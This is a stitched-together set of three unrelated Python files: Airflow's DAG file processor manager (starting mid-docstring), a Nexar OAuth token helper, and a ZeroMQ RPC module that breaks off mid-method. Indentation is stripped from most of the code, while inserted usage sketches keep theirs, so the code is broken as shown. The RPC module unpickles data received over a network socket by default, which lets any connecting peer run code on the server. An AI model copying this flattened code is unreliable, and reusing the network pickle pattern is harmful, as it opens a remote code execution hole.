for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param signal_conn: connection to communicate signal with processor agent.
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: whether to start the manager in async mode
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
# Set the signal conn in to non-blocking mode, so that attempting to
# send when the buffer is full errors, rather than hangs for-ever
# attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode:
os.set_blocking(self._signal_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if conf.get('core', 'sql_alchemy_conn').startswith('sqlite') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# Last time we cleaned up DAGs which are no longer in files
self.last_deactivate_stale_dags_time = timezone.make_aware(datetime.fromtimestamp(0))
# How often to check for DAGs which are no longer in files
self.deactivate_stale_dags_interval = conf.getint('scheduler', 'deactivate_stale_dags_interval')
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
@provide_session
def _deactivate_stale_dags(self, session=None):
"""Detects DAGs which are no longer present in files and deactivate them."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_deactivate_stale_dags_time).total_seconds()
if elapsed_time_since_refresh > self.deactivate_stale_dags_interval:
last_parsed = {
fp: self.get_last_finish_time(fp) for fp in self.file_paths if self.get_last_finish_time(fp)
}
to_deactivate = set()
dags_parsed = (
session.query(DagModel.dag_id, DagModel.fileloc, DagModel.last_parsed_time)
.filter(DagModel.is_active)
.all()
)
for dag in dags_parsed:
# The largest valid difference between a DagFileStat's last_finished_time and a DAG's
# last_parsed_time is _processor_timeout. Longer than that indicates that the DAG is
# no longer present in the file.
if (
dag.fileloc in last_parsed
and (dag.last_parsed_time + self._processor_timeout) < last_parsed[dag.fileloc]
):
self.log.info(f"DAG {dag.dag_id} is missing and will be deactivated.")
to_deactivate.add(dag.dag_id)
if to_deactivate:
deactivated = (
session.query(DagModel)
.filter(DagModel.dag_id.in_(to_deactivate))
.update({DagModel.is_active: False}, synchronize_session="fetch")
)
if deactivated:
self.log.info("Deactivated %i DAGs which are no longer present in file.", deactivated)
self.last_deactivate_stale_dags_time = timezone.utcnow()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
max_callbacks_per_loop = conf.getint("scheduler", "max_callbacks_per_loop")
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
if conf.getboolean("scheduler", "standalone_dag_processor"):
# Callbacks are only stored in the database when the standalone
# DAG processor is used, so there is nothing to fetch otherwise.
self._fetch_callbacks(max_callbacks_per_loop)
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._deactivate_stale_dags()
self._refresh_dag_dir()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
self._signal_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail than to deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (it only drives "max runs").
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
@provide_session
def _fetch_callbacks(self, max_callbacks: int, session: Session = NEW_SESSION):
"""Fetches callbacks from database and add them to the internal pipe for execution."""
self.log.debug("Fetching callbacks from the database.")
with prohibit_commit(session) as guard:
query = (
session.query(DbCallbackRequest)
.order_by(DbCallbackRequest.priority_weight.asc())
.limit(max_callbacks)
)
callbacks = with_row_locks(
query, of=DbCallbackRequest, session=session, **skip_locked(session=session)
).all()
for callback in callbacks:
try:
self._signal_conn.send(callback.get_callback_request())
session.delete(callback)
except Exception as e:
self.log.warning("Error adding callback for execution: %s, %s", callback, e)
guard.commit()
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
# Check if file path is a zipfile and get the full path of the python file.
# Without this, SerializedDagModel.remove_deleted_dags would delete zipped dags.
# Likewise DagCode.remove_deleted_code.
dag_filelocs = []
for fileloc in self._file_paths:
if not fileloc.endswith(".py") and zipfile.is_zipfile(fileloc):
with zipfile.ZipFile(fileloc) as z:
dag_filelocs.extend(
[
os.path.join(fileloc, info.filename)
for info in z.infolist()
if might_contain_dag(info.filename, True, z)
]
)
else:
dag_filelocs.append(fileloc)
SerializedDagModel.remove_deleted_dags(dag_filelocs)
DagModel.deactivate_deleted_dags(self._file_paths)
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(dag_filelocs)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[5] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
last_duration = (last_finish_time - processor.start_time).total_seconds()
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=last_duration,
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
file_name = os.path.splitext(os.path.basename(processor.file_path))[0].replace(os.sep, '.')
Stats.timing(f'dag_processing.last_duration.{file_name}', last_duration)
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Avoid creating duplicate processors, i.e. processors for the same file path
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
try:
files_with_mtime[file_path] = os.path.getmtime(file_path)
except FileNotFoundError:
self.log.warning("Skipping processing of missing file: %s", file_path)
continue
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so that multiple schedulers can work on
# different sets of files. Since we set the seed, the order will remain the same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
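# Hedged usage sketch (not in the original module): constructing DagFileProcessorManager
# directly with an in-process Pipe, roughly the way sync-mode callers or tests might.
# The DAG directory is a placeholder and the sequencing is illustrative only.
def _example_run_manager_once(dag_directory: str = "/tmp/dags") -> None:
    parent_conn, child_conn = multiprocessing.Pipe()
    manager = DagFileProcessorManager(
        dag_directory=dag_directory,
        max_runs=1,
        processor_timeout=timedelta(seconds=60),
        signal_conn=child_conn,
        dag_ids=None,
        pickle_dags=False,
        async_mode=False,
    )
    # In sync mode the parsing loop waits for AGENT_RUN_ONCE on the pipe, so the
    # caller queues a signal before start() enters the loop.
    parent_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
    manager.start()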
|
nexar_token.py
|
"""Main entry point to the service."""
import base64
import hashlib
import os
import re
import webbrowser
from multiprocessing import Process
from urllib.parse import parse_qs, urlparse
import requests
from oauthlib.oauth2 import BackendApplicationClient
from oauthlib.oauth2.rfc6749.errors import MissingTokenError
from requests_oauthlib import OAuth2Session
from local_service import main
PROD_TOKEN_URL = "https://identity.nexar.com/connect/token"
REDIRECT_URI = "http://localhost:3000/login"
AUTHORITY_URL = "https://identity.nexar.com/connect/authorize"
def get_token(client_id, client_secret):
"""Return the Nexar token from the client_id and client_secret provided."""
if not client_id or not client_secret:
raise Exception("client_id and/or client_secret are empty")
client = BackendApplicationClient(client_id=client_id)
oauth = OAuth2Session(client=client)
token = {}
try:
token = oauth.fetch_token(
token_url=PROD_TOKEN_URL,
client_id=client_id,
client_secret=client_secret,
include_client_id=True,
)
except MissingTokenError:
raise
return token
def get_token_with_login(client_id, client_secret, scope):
"""Open the Nexar authorization url from the client_id and scope provided."""
if not client_id or not client_secret:
raise Exception("client_id and/or client_secret are empty")
if not scope:
raise Exception("scope is empty")
token = {}
scope_list = ["openid", "profile", "email"] + scope
# Start the local service
server = Process(target=main)
server.daemon = True
server.start()
# PKCE code verifier and challenge
code_verifier = base64.urlsafe_b64encode(os.urandom(40)).decode("utf-8")
code_verifier = re.sub("[^a-zA-Z0-9]+", "", code_verifier)
code_challenge = hashlib.sha256(code_verifier.encode("utf-8")).digest()
code_challenge = base64.urlsafe_b64encode(code_challenge).decode("utf-8")
code_challenge = code_challenge.replace("=", "")
try:
# Request login page
oauth = OAuth2Session(client_id, redirect_uri=REDIRECT_URI, scope=scope_list)
authorization_url, _ = oauth.authorization_url(
url=AUTHORITY_URL,
code_challenge=code_challenge,
code_challenge_method="S256",
)
authorization_url = authorization_url.replace("+", "%20")
# Obtain redirect response
webbrowser.open_new(authorization_url)
redirect_response = input(
"\nPlease authorize access and enter the redirect URL: "
).strip()
# Terminate the local service because it is no longer needed
server.terminate()
redirect_params = parse_qs(urlparse(redirect_response).query)
auth_code = redirect_params["code"][0]
token = requests.post(
url=PROD_TOKEN_URL,
data={
"grant_type": "authorization_code",
"client_id": client_id,
"client_secret": client_secret,
"redirect_uri": REDIRECT_URI,
"code": auth_code,
"code_verifier": code_verifier,
},
allow_redirects=False,
).json()
except Exception:
raise
return token
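# Hedged usage sketch (not in the original module): fetching a client-credentials
# token with credentials read from environment variables. The variable names
# NEXAR_CLIENT_ID / NEXAR_CLIENT_SECRET are assumptions, not part of the API.
if __name__ == "__main__":
    example_client_id = os.environ.get("NEXAR_CLIENT_ID", "")
    example_client_secret = os.environ.get("NEXAR_CLIENT_SECRET", "")
    example_token = get_token(example_client_id, example_client_secret)
    print(example_token.get("access_token", ""))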
|
vnrpc.py
|
# encoding: UTF-8
import threading
import traceback
import signal
import zmq
from msgpack import packb, unpackb
from json import dumps, loads
try:
import cPickle
pDumps = cPickle.dumps
pLoads = cPickle.loads
except ImportError:
# for python 3
import pickle
pDumps = pickle.dumps
pLoads = pickle.loads
# Allow Ctrl-C to interrupt recv
signal.signal(signal.SIGINT, signal.SIG_DFL)
########################################################################
class RpcObject(object):
"""
RPC object.
Provides pack/unpack (serialization) interfaces for the data sent over the wire;
three tools are currently supported: json, msgpack and cPickle.
msgpack: the fastest, but the msgpack package usually needs to be installed;
json: slightly slower but the most portable, since most languages ship a built-in json library;
cPickle: average performance and Python-only, but it can transfer Python objects directly, which is very convenient.
msgpack is therefore recommended; fall back to json when talking to a language without msgpack support,
and use cPickle when the payload contains many custom Python objects.
Other serialization tools can be added here if desired.
"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
# Select the default serialization tool (the msgpack call is commented out; cPickle is used)
#self.useMsgpack()
self.usePickle()
#----------------------------------------------------------------------
def pack(self, data):
"""打包"""
pass
#----------------------------------------------------------------------
def unpack(self, data):
"""解包"""
pass
#----------------------------------------------------------------------
def __jsonPack(self, data):
"""使用json打包"""
return dumps(data)
#----------------------------------------------------------------------
def __jsonUnpack(self, data):
"""使用json解包"""
return loads(data)
#----------------------------------------------------------------------
def __msgpackPack(self, data):
"""使用msgpack打包"""
return packb(data)
#----------------------------------------------------------------------
def __msgpackUnpack(self, data):
"""使用msgpack解包"""
return unpackb(data)
#----------------------------------------------------------------------
def __picklePack(self, data):
"""使用cPickle打包"""
try:
return pDumps(data)
except:
data[1] = list(data[1])
return pDumps(data)
#----------------------------------------------------------------------
def __pickleUnpack(self, data):
"""使用cPickle解包"""
return pLoads(data)
#----------------------------------------------------------------------
def useJson(self):
"""使用json作为序列化工具"""
self.pack = self.__jsonPack
self.unpack = self.__jsonUnpack
#----------------------------------------------------------------------
def useMsgpack(self):
"""使用msgpack作为序列化工具"""
self.pack = self.__msgpackPack
self.unpack = self.__msgpackUnpack
#----------------------------------------------------------------------
def usePickle(self):
"""使用cPickle作为序列化工具"""
self.pack = self.__picklePack
self.unpack = self.__pickleUnpack
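# Hedged usage sketch (not in the original module): switching the serializer on an
# RpcObject and round-tripping a payload. The payload values are placeholders; the
# constructor above selects cPickle by default.
def _example_serializer_roundtrip():
    obj = RpcObject()
    obj.useJson()
    payload = {"symbol": "IF1706", "price": 3850.0}
    packed = obj.pack(payload)     # JSON string
    return obj.unpack(packed)      # back to a dict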
########################################################################
class RpcServer(RpcObject):
"""RPC服务器"""
#----------------------------------------------------------------------
def __init__(self, repAddress, pubAddress):
"""Constructor"""
super(RpcServer, self).__init__()
# Dictionary of registered functions: key is the function name, value is the function object
self.__functions = {}
# zmq sockets
self.__context = zmq.Context()
self.__socketREP = self.__context.socket(zmq.REP) # request/reply socket
self.__socketREP.bind(repAddress)
self.__socketPUB = self.__context.socket(zmq.PUB) # broadcast (publish) socket
self.__socketPUB.bind(pubAddress)
# Worker thread
self.__active = False # server running state
self.__thread = threading.Thread(target=self.run) # server worker thread
#----------------------------------------------------------------------
def start(self):
"""启动服务器"""
# 将服务器设为启动
self.__active = True
# 启动工作线程
if not self.__thread.isAlive():
self.__thread.start()
#----------------------------------------------------------------------
def stop(self, join=False):
"""停止服务器"""
# 将服务器设为停止
self.__active = False
# 等待工作线程退出
if join and self.__thread.isAlive():
self.__thread.join()
#----------------------------------------------------------------------
def run(self):
"""服务器运行函数"""
while self.__active:
# 使用poll来等待事件到达,等待1秒(1000毫秒)
if not self.__socketREP.poll(1000):
continue
# 从请求响应socket收取请求数据
reqb = self.__socketREP.recv()
# 序列化解包
req = self.unpack(reqb)
# 获取函数名和参数
name, args, kwargs = req
# 获取引擎中对应的函数对象,并执行调用,如果有异常则捕捉后返回
try:
func = self.__functions[name]
r = func(*args, **kwargs)
rep = [True, r]
except Exception as e:
rep = [False, traceback.format_exc()]
# 序列化打包
repb = self.pack(rep)
# 通过请求响应socket返回调用结果
self.__socketREP.send(repb)
#----------------------------------------------------------------------
def publish(self, topic, data):
"""
Broadcast (publish) data to subscribers.
topic: the topic (note: must be ascii encoded)
data: the payload to publish
"""
# Serialize the data
datab = self.pack(data)
# Send the data through the broadcast socket
self.__socketPUB.send_multipart([topic, datab])
#----------------------------------------------------------------------
def register(self, func):
"""注册函数"""
self.__functions[func.__name__] = func
########################################################################
class RpcClient(RpcObject):
"""RPC客户端"""
#----------------------------------------------------------------------
def __init__(self, reqAddress, subAddress):
"""Constructor"""
super(RpcClient, self).__init__()
# zmq endpoints
self.__reqAddress = reqAddress
self.__subAddress = subAddress
self.__context = zmq.Context()
self.__socketREQ = self.__context.socket(zmq.REQ) # request socket
self.__socketSUB = self.__context.socket(zmq.SUB) # broadcast subscription socket
# Worker thread, used to handle data pushed by the server
self.__active = False # client running state
self.__thread = threading.Thread(target=self.run) # client worker thread
#----------------------------------------------------------------------
def __getattr__(self, name):
"""实现远程调用功能"""
# 执行远程调用任务
def dorpc(*args, **kwargs):
# 生成请求
req = [name, args, kwargs]
# 序列化打包请求
reqb = self.pack(req)
# 发送请求并等待回应
self.__socketREQ.send(reqb)
repb = self.__socketREQ.recv()
# 序列化解包回应
rep = self.unpack(repb)
# 若正常则返回结果,调用失败则触发异常
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
#----------------------------------------------------------------------
def start(self):
"""启动客户端"""
# 连接端口
self.__socketREQ.connect(self.__reqAddress)
self.__socketSUB.connect(self.__subAddress)
# 将服务器设为启动
self.__active = True
# 启动工作线程
